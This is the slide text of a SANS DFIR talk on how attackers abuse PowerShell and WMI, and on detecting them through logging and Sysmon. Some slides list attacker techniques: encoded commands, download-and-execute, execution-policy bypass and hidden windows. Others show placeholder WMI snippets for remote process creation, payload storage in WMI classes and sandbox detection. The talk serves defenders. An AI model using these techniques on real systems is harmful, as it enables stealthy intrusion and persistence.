Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

SANS DFIR Prague: PowerShell & WMI

903 vues

Publié le

My presentation from SANS DFIR Summit covering PowerShell and WMI.

Publié dans : Technologie
  • Soyez le premier à commenter

SANS DFIR Prague: PowerShell & WMI

  1. 1. • Quick Background • Malicious Possibilities • Real-World Examples • Detection & Defense
  2. 2. • Joe Slowik, Adversary Hunter • Current: Dragos Adversary Hunter • Previous: • Los Alamos National Lab: IR Lead • US Navy: Information Warfare Officer • University of Chicago: Philosophy Drop-Out
  3. 3. • Scripting and interactive language • Introduced in 2006, integral to Win7+ since 2009 • Full access to COM & WMI for system administration
  4. 4. • WMI = Windows Management Instrumentation • Interactive and scriptable framework for local and remote administration • Frequently accessed via PowerShell
  5. 5. http://oversitesentry.com/wp-content/uploads/2015/08/wmiarchitecture.png
  6. 6. http://kevinpelgrims.com/blog/files/images/2010/02/powershell_rsm.png
  7. 7. http://www.opentechguides.com/how-to/article/powershell/132/get- system-info-remotely.html
  8. 8. https://4sysops.com/wp-content/uploads/2013/03/WBEMTest-Translate-into-PowerShell.png
  9. 9. http://www.freeiconspng.co m/img/17209 • PowerShell is a powerful, useful tool for network administration • Widely used in Windows Enterprise environments
  10. 10. • WMI enables significant access to review and modify system data • Access via PowerShell allows for scripting and automated possibilities
  11. 11. • PowerShell’s ubiquity adds a significant capability to potential attacker • Enhances ability to ‘live off the land’ • Expands initial infection vectors
  12. 12. Command Use -EncodedCommand Accepts Base64-encoded input for execution within PowerShell (New-Object System.New.Webclient).DownloadFile() Download a file from a remote location; can be piped to Start-Process to execute -ExecutionPolicy Bypass Circumvent system limits on script execution -WindowStyle Hidden Hide the command window from the user -Invoke-Expression Execute arbitrary code or commands
  13. 13. Delivery Vectors VBA VBS BAT JS Registry Startup .lnk
  14. 14. https://adsecurity.org/wp-content/uploads/2016/02/PowerShell-Detection-NetWebClientDownload.jpg
  15. 15. • WMI is also ubiquitous, potent ‘dual-use’ • Can enable: • Complex exploitation, persistence of infected host • New vectors to pivot within network
  16. 16. • PsExec-like remote execution • Malicious file/script storage • Persistence when combined with file or registry activity
  17. 17. • Pentesting frameworks • Crimeware/Commodity malware • APT
  18. 18. • Malicious VBA decodes to PowerShell • Retrieves, then executes ransomware payload
  19. 19. • WMI filter retrieved on schedule • Returns base64-encoded PowerShell • PowerShell re-launches backdoor https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html
  20. 20. https://www.carbonblack.com/wp-content/uploads/2015/12/PS7.png
  21. 21. CMD •Command execution •Execution Parameters PowerShell •Interactive and Scripts •Flags, Modifiers, full Visibility WMI • Log Events • Correlate with Other Activity
  22. 22. What is required to achieve ‘bad’? Process Execution Persistence Encode Decode Download Upload
  23. 23. • Sysinternals Sysmon • Windows Loggging Service (WLS) • WMI Logging via WMI Subscription • PowerShell Logging • Proprietary Host-based Security
  24. 24. • WLS incorporates PowerShell logging natively • Otherwise: • Windows 7+ • Powershell 5.0+ • Enable logging! • See: • https://www.fireeye.com/blog/threat- research/2016/02/greater_visibilityt.html
  25. 25. • Sysinternals Sysmon – latest version includes WMI visibility • But logging/alerting will need to be tuned • DIY via WMI Subscription creation • Otherwise – commercial products
  26. 26. Establish Visibility Baseline ‘Normal’ Identify Malicious Create Alerts & Alarms Develop Response
  27. 27. • What PowerShell/WMI scripts are used in ‘normal’ network administration? • What commands never have legitimate use? • What – if any – items require whitelisting?
  28. 28. wmic /node:REMOTESYSTEM process call create “EVIL_COMMAND” SELECT * FROM Win32_BIOS WHERE SerialNumber LIKE “%VMware%” $BADTHING=New-ObjectManagement.ManagementClass($REMOTESYSTEM, [String]::Empty,$null) $BADTHING[‘__CLASS’]=’Evil_Malware’ $BADTHING.Properties.Add(‘SomethingEvil’,[Management.CimType] ::String,$False) $BADTHING.Properties[‘SomethingEvil’].Value =$PAYLOAD $EvilClass.Put()
  29. 29. • Create Event Consumer: performs action when triggered by event • Pair with Event Filter: events of interest • Filter to Consumer Binding: bind filter to consumer • Export results to log file, data store • Credit: https://www.fireeye.com/blog/threat- research/2016/08/wmi_vs_wmi_monitor.html

×